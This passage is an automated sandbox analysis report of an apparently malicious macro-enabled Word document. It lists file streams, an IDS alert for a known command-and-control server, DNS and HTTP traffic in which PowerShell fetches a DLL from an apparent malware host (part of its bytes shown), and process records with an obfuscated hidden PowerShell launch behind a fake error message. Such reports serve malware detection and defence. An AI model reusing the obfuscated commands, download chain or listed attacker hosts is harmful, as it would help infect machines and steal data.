                                Entropy:4.00187355764
                                Base64 Encoded:False
                                Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                General
                                Stream Path:\x5DocumentSummaryInformation
                                File Type:data
                                Stream Size:4096
                                Entropy:0.280441275353
                                Base64 Encoded:False
                                Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 568
                                General
                                Stream Path:\x5SummaryInformation
                                File Type:data
                                Stream Size:568
                                Entropy:4.21212750192
                                Base64 Encoded:False
                                Stream Path: 1Table, File Type: data, Stream Size: 6424
                                General
                                Stream Path:1Table
                                File Type:data
                                Stream Size:6424
                                Entropy:6.13855158031
                                Base64 Encoded:True
                                Stream Path: Data, File Type: data, Stream Size: 99193
                                General
                                Stream Path:Data
                                File Type:data
                                Stream Size:99193
                                Entropy:7.39010520705
                                Base64 Encoded:True
                                Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 505
                                General
                                Stream Path:Macros/PROJECT
                                File Type:ASCII text, with CRLF line terminators
                                Stream Size:505
                                Entropy:5.46028687806
                                Base64 Encoded:True
                                Stream Path: Macros/PROJECTwm, File Type: data, Stream Size: 131
                                General
                                Stream Path:Macros/PROJECTwm
                                File Type:data
                                Stream Size:131
                                Entropy:3.71027191407
                                Base64 Encoded:False
                                Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 4487
                                General
                                Stream Path:Macros/VBA/_VBA_PROJECT
                                File Type:data
                                Stream Size:4487
                                Entropy:5.34743792545
                                Base64 Encoded:False
                                Stream Path: Macros/VBA/dir, File Type: Tower/XP rel 3 object not stripped - version 18435, Stream Size: 660
                                General
                                Stream Path:Macros/VBA/dir
                                File Type:Tower/XP rel 3 object not stripped - version 18435
                                Stream Size:660
                                Entropy:6.38918771534
                                Base64 Encoded:True
                                Stream Path: WordDocument, File Type: data, Stream Size: 20526
                                General
                                Stream Path:WordDocument
                                File Type:data
                                Stream Size:20526
                                Entropy:4.14121071974
                                Base64 Encoded:False

                                Network Behavior

                                Snort IDS Alerts

                                Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                01/12/21-19:16:23.562924 | TCP | 2404340 | ET CNC Feodo Tracker Reported CnC Server TCP group 21 | 49170 | 80 | 192.168.2.22 | 71.72.196.159

                                Network Port Distribution

                                TCP Packets

                                Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                Jan 12, 2021 19:16:04.220208883 CET | 49165 | 443 | 192.168.2.22 | 51.79.161.36
                                Jan 12, 2021 19:16:04.427264929 CET | 443 | 49165 | 51.79.161.36 | 192.168.2.22
                                Jan 12, 2021 19:16:04.427385092 CET | 49165 | 443 | 192.168.2.22 | 51.79.161.36
                                Jan 12, 2021 19:16:04.441338062 CET | 49165 | 443 | 192.168.2.22 | 51.79.161.36
                                Jan 12, 2021 19:16:04.648400068 CET | 443 | 49165 | 51.79.161.36 | 192.168.2.22
                                Jan 12, 2021 19:16:04.648617983 CET | 443 | 49165 | 51.79.161.36 | 192.168.2.22
                                Jan 12, 2021 19:16:04.648642063 CET | 443 | 49165 | 51.79.161.36 | 192.168.2.22
                                Jan 12, 2021 19:16:04.648689985 CET | 443 | 49165 | 51.79.161.36 | 192.168.2.22
                                Jan 12, 2021 19:16:04.648737907 CET | 49165 | 443 | 192.168.2.22 | 51.79.161.36
                                Jan 12, 2021 19:16:04.648901939 CET | 49165 | 443 | 192.168.2.22 | 51.79.161.36
                                Jan 12, 2021 19:16:04.662923098 CET | 49165 | 443 | 192.168.2.22 | 51.79.161.36
                                Jan 12, 2021 19:16:04.663800001 CET | 49166 | 443 | 192.168.2.22 | 51.79.161.36
                                Jan 12, 2021 19:16:04.862540960 CET | 443 | 49166 | 51.79.161.36 | 192.168.2.22
                                Jan 12, 2021 19:16:04.862718105 CET | 49166 | 443 | 192.168.2.22 | 51.79.161.36
                                Jan 12, 2021 19:16:04.863187075 CET | 49166 | 443 | 192.168.2.22 | 51.79.161.36
                                Jan 12, 2021 19:16:04.870026112 CET | 443 | 49165 | 51.79.161.36 | 192.168.2.22
                                Jan 12, 2021 19:16:05.061920881 CET | 443 | 49166 | 51.79.161.36 | 192.168.2.22
                                Jan 12, 2021 19:16:05.062295914 CET | 443 | 49166 | 51.79.161.36 | 192.168.2.22
                                Jan 12, 2021 19:16:05.062325001 CET | 443 | 49166 | 51.79.161.36 | 192.168.2.22
                                Jan 12, 2021 19:16:05.062357903 CET | 443 | 49166 | 51.79.161.36 | 192.168.2.22
                                Jan 12, 2021 19:16:05.062414885 CET | 49166 | 443 | 192.168.2.22 | 51.79.161.36
                                Jan 12, 2021 19:16:05.062875032 CET | 49166 | 443 | 192.168.2.22 | 51.79.161.36
                                Jan 12, 2021 19:16:05.064313889 CET | 49166 | 443 | 192.168.2.22 | 51.79.161.36
                                Jan 12, 2021 19:16:05.145780087 CET | 49167 | 443 | 192.168.2.22 | 185.2.4.29
                                Jan 12, 2021 19:16:05.197062969 CET | 443 | 49167 | 185.2.4.29 | 192.168.2.22
                                Jan 12, 2021 19:16:05.197251081 CET | 49167 | 443 | 192.168.2.22 | 185.2.4.29
                                Jan 12, 2021 19:16:05.197689056 CET | 49167 | 443 | 192.168.2.22 | 185.2.4.29
                                Jan 12, 2021 19:16:05.248888016 CET | 443 | 49167 | 185.2.4.29 | 192.168.2.22
                                Jan 12, 2021 19:16:05.248907089 CET | 443 | 49167 | 185.2.4.29 | 192.168.2.22
                                Jan 12, 2021 19:16:05.249005079 CET | 443 | 49167 | 185.2.4.29 | 192.168.2.22
                                Jan 12, 2021 19:16:05.249093056 CET | 49167 | 443 | 192.168.2.22 | 185.2.4.29
                                Jan 12, 2021 19:16:05.251177073 CET | 49167 | 443 | 192.168.2.22 | 185.2.4.29
                                Jan 12, 2021 19:16:05.251851082 CET | 49168 | 443 | 192.168.2.22 | 185.2.4.29
                                Jan 12, 2021 19:16:05.263067961 CET | 443 | 49166 | 51.79.161.36 | 192.168.2.22
                                Jan 12, 2021 19:16:05.302382946 CET | 443 | 49167 | 185.2.4.29 | 192.168.2.22
                                Jan 12, 2021 19:16:05.303016901 CET | 443 | 49168 | 185.2.4.29 | 192.168.2.22
                                Jan 12, 2021 19:16:05.303092957 CET | 49168 | 443 | 192.168.2.22 | 185.2.4.29
                                Jan 12, 2021 19:16:05.303483009 CET | 49168 | 443 | 192.168.2.22 | 185.2.4.29
                                Jan 12, 2021 19:16:05.354767084 CET | 443 | 49168 | 185.2.4.29 | 192.168.2.22
                                Jan 12, 2021 19:16:05.354849100 CET | 443 | 49168 | 185.2.4.29 | 192.168.2.22
                                Jan 12, 2021 19:16:05.354964018 CET | 443 | 49168 | 185.2.4.29 | 192.168.2.22
                                Jan 12, 2021 19:16:05.355037928 CET | 49168 | 443 | 192.168.2.22 | 185.2.4.29
                                Jan 12, 2021 19:16:05.357589960 CET | 49168 | 443 | 192.168.2.22 | 185.2.4.29
                                Jan 12, 2021 19:16:05.408828974 CET | 443 | 49168 | 185.2.4.29 | 192.168.2.22
                                Jan 12, 2021 19:16:05.758419037 CET | 49169 | 80 | 192.168.2.22 | 152.32.168.168
                                Jan 12, 2021 19:16:05.992652893 CET | 80 | 49169 | 152.32.168.168 | 192.168.2.22
                                Jan 12, 2021 19:16:05.992826939 CET | 49169 | 80 | 192.168.2.22 | 152.32.168.168
                                Jan 12, 2021 19:16:05.992989063 CET | 49169 | 80 | 192.168.2.22 | 152.32.168.168
                                Jan 12, 2021 19:16:06.226633072 CET | 80 | 49169 | 152.32.168.168 | 192.168.2.22
                                Jan 12, 2021 19:16:06.229259968 CET | 80 | 49169 | 152.32.168.168 | 192.168.2.22
                                Jan 12, 2021 19:16:06.229289055 CET | 80 | 49169 | 152.32.168.168 | 192.168.2.22
                                Jan 12, 2021 19:16:06.229307890 CET | 80 | 49169 | 152.32.168.168 | 192.168.2.22
                                Jan 12, 2021 19:16:06.229326010 CET | 80 | 49169 | 152.32.168.168 | 192.168.2.22
                                Jan 12, 2021 19:16:06.229338884 CET | 49169 | 80 | 192.168.2.22 | 152.32.168.168
                                Jan 12, 2021 19:16:06.229357958 CET | 80 | 49169 | 152.32.168.168 | 192.168.2.22
                                Jan 12, 2021 19:16:06.229374886 CET | 80 | 49169 | 152.32.168.168 | 192.168.2.22
                                Jan 12, 2021 19:16:06.229398012 CET | 49169 | 80 | 192.168.2.22 | 152.32.168.168
                                Jan 12, 2021 19:16:06.229412079 CET | 49169 | 80 | 192.168.2.22 | 152.32.168.168
                                Jan 12, 2021 19:16:06.229423046 CET | 80 | 49169 | 152.32.168.168 | 192.168.2.22
                                Jan 12, 2021 19:16:06.229440928 CET | 80 | 49169 | 152.32.168.168 | 192.168.2.22
                                Jan 12, 2021 19:16:06.229458094 CET | 80 | 49169 | 152.32.168.168 | 192.168.2.22
                                Jan 12, 2021 19:16:06.229473114 CET | 80 | 49169 | 152.32.168.168 | 192.168.2.22
                                Jan 12, 2021 19:16:06.229481936 CET | 49169 | 80 | 192.168.2.22 | 152.32.168.168
                                Jan 12, 2021 19:16:06.229506969 CET | 49169 | 80 | 192.168.2.22 | 152.32.168.168
                                Jan 12, 2021 19:16:06.463335037 CET | 80 | 49169 | 152.32.168.168 | 192.168.2.22
                                Jan 12, 2021 19:16:06.463362932 CET | 80 | 49169 | 152.32.168.168 | 192.168.2.22
                                Jan 12, 2021 19:16:06.463380098 CET | 80 | 49169 | 152.32.168.168 | 192.168.2.22
                                Jan 12, 2021 19:16:06.463392019 CET | 80 | 49169 | 152.32.168.168 | 192.168.2.22
                                Jan 12, 2021 19:16:06.463403940 CET | 80 | 49169 | 152.32.168.168 | 192.168.2.22
                                Jan 12, 2021 19:16:06.463417053 CET | 80 | 49169 | 152.32.168.168 | 192.168.2.22
                                Jan 12, 2021 19:16:06.463433027 CET | 80 | 49169 | 152.32.168.168 | 192.168.2.22
                                Jan 12, 2021 19:16:06.463448048 CET | 49169 | 80 | 192.168.2.22 | 152.32.168.168
                                Jan 12, 2021 19:16:06.463457108 CET | 49169 | 80 | 192.168.2.22 | 152.32.168.168
                                Jan 12, 2021 19:16:06.463469982 CET | 80 | 49169 | 152.32.168.168 | 192.168.2.22
                                Jan 12, 2021 19:16:06.463486910 CET | 80 | 49169 | 152.32.168.168 | 192.168.2.22
                                Jan 12, 2021 19:16:06.463505983 CET | 49169 | 80 | 192.168.2.22 | 152.32.168.168
                                Jan 12, 2021 19:16:06.463515997 CET | 80 | 49169 | 152.32.168.168 | 192.168.2.22
                                Jan 12, 2021 19:16:06.463536024 CET | 80 | 49169 | 152.32.168.168 | 192.168.2.22
                                Jan 12, 2021 19:16:06.463547945 CET | 49169 | 80 | 192.168.2.22 | 152.32.168.168
                                Jan 12, 2021 19:16:06.463562965 CET | 80 | 49169 | 152.32.168.168 | 192.168.2.22
                                Jan 12, 2021 19:16:06.463581085 CET | 80 | 49169 | 152.32.168.168 | 192.168.2.22
                                Jan 12, 2021 19:16:06.463594913 CET | 49169 | 80 | 192.168.2.22 | 152.32.168.168
                                Jan 12, 2021 19:16:06.463604927 CET | 80 | 49169 | 152.32.168.168 | 192.168.2.22
                                Jan 12, 2021 19:16:06.463622093 CET | 80 | 49169 | 152.32.168.168 | 192.168.2.22
                                Jan 12, 2021 19:16:06.463638067 CET | 49169 | 80 | 192.168.2.22 | 152.32.168.168
                                Jan 12, 2021 19:16:06.463645935 CET | 80 | 49169 | 152.32.168.168 | 192.168.2.22
                                Jan 12, 2021 19:16:06.463661909 CET | 80 | 49169 | 152.32.168.168 | 192.168.2.22
                                Jan 12, 2021 19:16:06.463671923 CET | 49169 | 80 | 192.168.2.22 | 152.32.168.168
                                Jan 12, 2021 19:16:06.463686943 CET | 80 | 49169 | 152.32.168.168 | 192.168.2.22
                                Jan 12, 2021 19:16:06.463695049 CET | 49169 | 80 | 192.168.2.22 | 152.32.168.168
                                Jan 12, 2021 19:16:06.463711023 CET | 80 | 49169 | 152.32.168.168 | 192.168.2.22
                                Jan 12, 2021 19:16:06.463726997 CET | 80 | 49169 | 152.32.168.168 | 192.168.2.22
                                Jan 12, 2021 19:16:06.463742018 CET | 49169 | 80 | 192.168.2.22 | 152.32.168.168
                                Jan 12, 2021 19:16:06.657936096 CET | 49169 | 80 | 192.168.2.22 | 152.32.168.168
                                Jan 12, 2021 19:16:06.697458982 CET | 80 | 49169 | 152.32.168.168 | 192.168.2.22
                                Jan 12, 2021 19:16:06.697488070 CET | 80 | 49169 | 152.32.168.168 | 192.168.2.22
                                Jan 12, 2021 19:16:06.697505951 CET | 80 | 49169 | 152.32.168.168 | 192.168.2.22
                                Jan 12, 2021 19:16:06.697529078 CET | 80 | 49169 | 152.32.168.168 | 192.168.2.22
                                Jan 12, 2021 19:16:06.697554111 CET | 80 | 49169 | 152.32.168.168 | 192.168.2.22
                                Jan 12, 2021 19:16:06.697577000 CET | 80 | 49169 | 152.32.168.168 | 192.168.2.22

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 12, 2021 19:16:03.922451019 CET | 52197 | 53 | 192.168.2.22 | 8.8.8.8
Jan 12, 2021 19:16:04.207346916 CET | 53 | 52197 | 8.8.8.8 | 192.168.2.22
Jan 12, 2021 19:16:05.088341951 CET | 53099 | 53 | 192.168.2.22 | 8.8.8.8
Jan 12, 2021 19:16:05.145020008 CET | 53 | 53099 | 8.8.8.8 | 192.168.2.22
Jan 12, 2021 19:16:05.367438078 CET | 52838 | 53 | 192.168.2.22 | 8.8.8.8
Jan 12, 2021 19:16:05.757515907 CET | 53 | 52838 | 8.8.8.8 | 192.168.2.22

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Jan 12, 2021 19:16:03.922451019 CET | 192.168.2.22 | 8.8.8.8 | 0x62a5 | Standard query (0) | shulovbaazar.com | A (IP address) | IN (0x0001)
Jan 12, 2021 19:16:05.088341951 CET | 192.168.2.22 | 8.8.8.8 | 0x523f | Standard query (0) | mybusinessevent.com | A (IP address) | IN (0x0001)
Jan 12, 2021 19:16:05.367438078 CET | 192.168.2.22 | 8.8.8.8 | 0x51f2 | Standard query (0) | uhk.cncranes.com | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Jan 12, 2021 19:16:04.207346916 CET | 8.8.8.8 | 192.168.2.22 | 0x62a5 | No error (0) | shulovbaazar.com | | 51.79.161.36 | A (IP address) | IN (0x0001)
Jan 12, 2021 19:16:05.145020008 CET | 8.8.8.8 | 192.168.2.22 | 0x523f | No error (0) | mybusinessevent.com | | 185.2.4.29 | A (IP address) | IN (0x0001)
Jan 12, 2021 19:16:05.757515907 CET | 8.8.8.8 | 192.168.2.22 | 0x51f2 | No error (0) | uhk.cncranes.com | uhk.asiash.com | | CNAME (Canonical name) | IN (0x0001)
Jan 12, 2021 19:16:05.757515907 CET | 8.8.8.8 | 192.168.2.22 | 0x51f2 | No error (0) | uhk.asiash.com | | 152.32.168.168 | A (IP address) | IN (0x0001)

HTTP Request Dependency Graph

• uhk.cncranes.com
• 69.49.88.46

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.22 | 49169 | 152.32.168.168 | 80 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | kBytes transferred | Direction | Data
Jan 12, 2021 19:16:05.992989063 CET | 4 | OUT | GET /ErrorPages/3/ HTTP/1.1
Host: uhk.cncranes.com
Connection: Keep-Alive
Jan 12, 2021 19:16:06.229259968 CET | 6 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 12 Jan 2021 18:16:06 GMT
Content-Type: application/octet-stream
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=60
Set-Cookie: 5ffde7661f466=1610475366; expires=Tue, 12-Jan-2021 18:17:06 GMT; Max-Age=60; path=/
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Tue, 12 Jan 2021 18:16:06 GMT
Expires: Tue, 12 Jan 2021 18:16:06 GMT
Content-Disposition: attachment; filename="SfDrGyeyuy.dll"
Content-Transfer-Encoding: binary
                                Data Raw: 33 65 37 30 0d 0a 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 5a de fd 5f 00 00 00 00 00 00 00 00 e0 00 0e 21 0b 01 02 32 00 46 00 00 00 d4 04 00 00 00 00 00 f0 21 00 00 00 10 00 00 00 60 00 00 00 00 00 10 00 10 00 00 00 02 00 00 03 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 05 00 00 04 00 00 01 09 06 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 fc 70 00 00 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 05 00 58 15 00 00 00 50 05 00 d4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 72 00 00 18 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 8b 43 00 00 00 10 00 00 00 44 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 0c 01 00 00 00 60 00 00 00 02 00 00 00 48 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 d8 08 00 00 00 70 00 00 00 0a 00 00 00 4a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 65 78 74 34 00 00 a4 bf 04 00 00 80 00 00 00 c0 04 00 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 65 78 74 35 00 00 64 00 00 00 00 40 05 00 00 02 00 00 00 14 05 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 40 2e 72 65 6c 6f 63 00 00 d4 07 00 00 00 50 05 00 00 08 00 00 00 16 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                Data Ascii: 3e70MZ@!L!This program cannot be run in DOS mode.$PELZ_!2F!``pdXPxr.textCD `.rdata`H@@.datapJ@.text4T@.text5d@ @.relocP@B


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.22 | 49171 | 69.49.88.46 | 80 | C:\Windows\SysWOW64\rundll32.exe

Timestamp | kBytes transferred | Direction | Data
Jan 12, 2021 19:16:37.122618914 CET | 364 | OUT | POST /kdd8h70lwp/lfu3p05/u2kanr3/ HTTP/1.1
DNT: 0
Referer: 69.49.88.46/kdd8h70lwp/lfu3p05/u2kanr3/
Content-Type: multipart/form-data; boundary=--------------IOWFryyt5oe5vI
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 69.49.88.46
Content-Length: 5572
Connection: Keep-Alive
Cache-Control: no-cache
Jan 12, 2021 19:16:38.436824083 CET | 371 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 12 Jan 2021 18:16:38 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
                                Data Raw: 39 39 34 0d 0a 18 0c 33 81 a5 5c 21 07 48 98 20 3e ef 9b b4 36 51 a4 10 c4 36 26 94 da be ac 37 1b c0 26 61 78 e1 3a c8 e4 19 89 b1 c6 8b 33 df 6e 09 2b e6 91 64 a8 37 ce a4 5a c5 0e 46 a5 72 2b 7f ea 5b 22 cc d9 e8 2a ce 37 57 64 6b 3d cf 97 75 7a c0 30 ec f7 a3 a1 48 0f e9 96 aa 07 7f 8b 7e 5c 37 d1 18 3c 20 de ee d7 a6 76 9e 3f a1 e4 1f 30 8d ab 05 8b c1 6a 9f 30 0b 30 e4 bc a8 3b dd 80 a5 3a 8a 44 56 d9 9c e2 00 15 ab ab 2e d8 97 37 ab 65 54 5e c8 01 af a9 ad 73 36 cc b0 a7 08 12 ae 0d 08 8a cb bb 9f 5e b1 e5 1b d6 a7 c5 09 db e9 72 a7 1a 9d a1 c9 34 4c ff 1d be e3 21 ff be ed 55 c2 55 f6 b9 cd 84 11 e1 79 f1 38 1c 91 ea 2f fd 74 58 27 88 5f 73 5d 3f 78 1b 56 7c d2 c8 90 80 b5 70 fb b5 0c 1d 0b 81 24 30 5a e2 c6 3e 43 4c 93 87 8d 67 c9 8f a1 72 d2 4c 9d 65 27 9b 38 46 cd 9d ca 59 15 a8 81 c1 a7 16 32 7f 15 e8 51 51 21 d8 05 80 2b 51 e4 f5 9b 97 86 45 d9 be 65 df 8d b5 ea bd d8 3c 49 8b bc 18 d0 93 27 2a 5e 30 38 fd 3b 19 4e 5c 11 f0 ab 5c a5 87 60 bc 51 81 0d e7 93 5e 34 d3 fb 0a a7 85 21 0a e2 32 77 28 d2 9e 1b db fa 12 23 dc 7b 5e 33 5c 13 9c b7 94 9b d1 92 ab 97 14 73 40 8b 58 45 8b f5 48 b2 1d d9 f8 b0 92 12 60 60 b9 0c 3e 9c 8d dd 95 0f a1 10 48 76 f7 39 ed 16 99 fe b7 f8 69 8f e9 47 43 9d a5 2d 66 68 c2 cb 95 a6 a4 ee 1d 67 ae 5f f5 0d e5 b0 d3 0c f3 c6 ec 99 86 9e 34 25 95 ce af c3 78 4c da 95 4d 73 96 8e 3c 9e e3 39 3d 95 3e b4 89 34 79 ab 42 81 5a 3c 5c 7f 0d 68 1f c7 c7 60 98 f8 21 65 3e ed 9c c9 47 c1 b4 45 70 29 22 51 9f 18 14 4b 41 27 fa 9d c7 f4 0f e4 8a e6 86 48 f0 a8 8c d9 e0 02 32 75 fe f9 ec 4f 70 c2 b0 67 63 b2 15 6f 3f fe f3 96 d8 e0 40 f7 a5 db aa 68 3b a6 5d 5b 4d e6 90 f0 b4 90 03 68 92 b4 f5 4b 8b 72 3d 76 26 b3 f1 df 06 cc a0 8f 4c ce 4a ba 0b 9b 82 88 6c 2c a3 02 f2 68 84 09 df f4 5c 0a 8f 49 8b 3b b0 a1 10 fb 2c 2b 8e e6 67 2d 3f 43 e5 33 30 36 09 65 13 04 b9 6d 48 08 1c 03 9f 4b 11 af 47 4d de d4 96 53 f7 31 8a c4 00 2f 68 0d c4 e3 33 cc 20 12 07 d3 b7 8d 1a 86 f5 6d 29 d9 d6 b0 1d 78 b7 98 
f7 40 6c c0 41 05 d5 4c a7 5e e5 56 e4 9d 5a f2 07 20 83 78 4c 4b 88 f5 28 41 0a 48 ae 33 b8 54 ed db 5c cf fc 43 d4 5f 25 db bb 55 e7 6a ca 5d 8f a4 2e 85 63 40 ba 77 6b 51 2c 20 b8 74 37 9d 9b dd 17 c7 0c 5a e1 56 d9 d1 f9 4c 05 5d 19 c9 36 d9 9b bc 1e bf 35 d9 95 43 9c 53 56 03 fe 52 62 06 35 f1 3d 20 72 f8 e0 e4 71 2f 04 d9 6d e6 30 1d eb a3 fc 95 9b 18 fc 78 ca 25 48 f1 62 8d 66 16 97 4e f6 c5 40 24 e0 55 da 65 3b bb b3 d8 4e d0 1c 4a 4b d1 60 23 b0 ab ac 02 2d 45 c9 fa ee 74 18 c3 91 82 0b 2c 8d 1c 68 5f 10 c0 c9 6a 03 e3 39 df e5 f5 3c a8 85 9e 0a 00 26 50 af 79 5c 35 b4 3d 09 79 90 a4 c0 90 2a b0 4a a4 33 42 59 02 38 ba a4 e0 43 09 ef a5 b8 38 f4 df 48 ee 9e 07 49 a9 81 ff cb 83 bf 8a e2 15 28 00 8d e7 83 4d b0 32 b8 54 14 99 fb 8b 24 38 94 95 a8 62 3b d8 dc 08 76 05 da 71 66 e3 ef 5a db 4f 4a de 33 f5 b8 41 3c cf c3 aa 84 14 02 91 1c d4 eb cd 35 1d 7b 85 ac 78 3c 39 42 32 f2 49 61 91 47 4b 64 3c 34 35 6f 46 95 a6 08 c3 4a 57 15 3b 10 d5 c4 5e 84 81 f5 0b d0 4d fa b1 1b 2c 9f 4a 02 cd 84 08 69 d0 c3 dc e4 d4 b4 8b b7 bc e9 5e 0c 3a 34 aa 80 9b 6a 12 6b 74 cc d7 76 f7 0b 7f 53 7b 80 4b 06 3e d1 3e 81 f6 c3 ce ec 8d 6f a7 dd 14 43 cc 38 44 12 2c dd b0 c6 6a 11 52 29 a8 3f b2 92 ff fb 96 c2 19 a3 ce 14 ed 65 ea d4 0b 14 16 b8 68 22 df 49 14 3e fb af 93 d7 60 9f 11 07 31 85 6c a3 65 41 58 a7 3d 43 f2 8b f5 11 b7 f4 ff e8 c1 f2 78 97 8d fe c9 d4 0b 37 0f a1 3d ea 74 f8 2d d8 e8 ee 5a e3 44 b9 86 59 c7 3f 13 ae c1 d7 c2 43 74 c3 5e 01 ff 09 14 0b 34 6c b0 86 c6 d7 6b 72 df
                                Data Ascii: 9943\!H >6Q6&7&ax:3n+d7ZFr+["*7Wdk=uz0H~\7< v?0j00;:DV.7eT^s6^r4L!UUy8/tX'_s]?xV|p$0Z>CLgrLe'8FY2QQ!+QEe<I'*^08;N\\`Q^4!2w(#{^3\s@XEH``>Hv9iGC-fhg_4%xLMs<9=>4yBZ<\h`!e>GEp)"QKA'H2uOpgco?@h;][MhKr=v&LJl,h\I;,+g-?C306emHKGMS1/h3 m)x@lAL^VZ xLK(AH3T\C_%Uj].c@wkQ, t7ZVL]65CSVRb5= rq/m0x%HbfN@$Ue;NJK`#-Et,h_j9<&Py\5=y*J3BY8C8HI(M2T$8b;vqfZOJ3A<5{x<9B2IaGKd<45oFJW;^M,Ji^:4jktvS{K>>oC8D,jR)?eh"I>`1leAX=Cx7=t-ZDY?Ct^4lkr


                                Behavior

                                System Behavior

General

Start time: 19:15:38
Start date: 12/01/2021
Path: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit): false
Commandline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Imagebase: 0x13fdc0000
File size: 1424032 bytes
MD5 hash: 95C38D04597050285A18F66039EDB456
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 19:15:40
Start date: 12/01/2021
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD 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
Imagebase: 0x49d80000
File size: 345088 bytes
MD5 hash: 5746BD7E255DD6A8AFA06F7C42C1BA41
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate

General

Start time: 19:15:40
Start date: 12/01/2021
Path: C:\Windows\System32\msg.exe
Wow64 process (32bit): false
Commandline: msg user /v Word experienced an error trying to open the file.
Imagebase: 0xff1c0000
File size: 26112 bytes
MD5 hash: 2214979661E779C3E3C33D4F14E6F3AC
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate

General

Start time: 19:15:41
Start date: 12/01/2021
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: POwersheLL -w hidden -ENCOD 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
Imagebase: 0x13f2e0000
File size: 473600 bytes
MD5 hash: 852D67A27E454BD389FA7F02A8CBE23F
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000005.00000002.2107242892.0000000000216000.00000004.00000001.sdmp, Author: Florian Roth
• Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000005.00000002.2107409443.0000000001BA6000.00000004.00000001.sdmp, Author: Florian Roth
Reputation: high

General

Start time: 19:15:50
Start date: 12/01/2021
Path: C:\Windows\System32\rundll32.exe
Wow64 process (32bit): false
Commandline: 'C:\Windows\system32\rundll32.exe' C:\Users\user\Wdduy2m\Tmc1kuo\J70H.dll ShowDialogA
Imagebase: 0xffbb0000
File size: 45568 bytes
MD5 hash: DD81D91FF3B0763C392422865C9AC12E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate

General

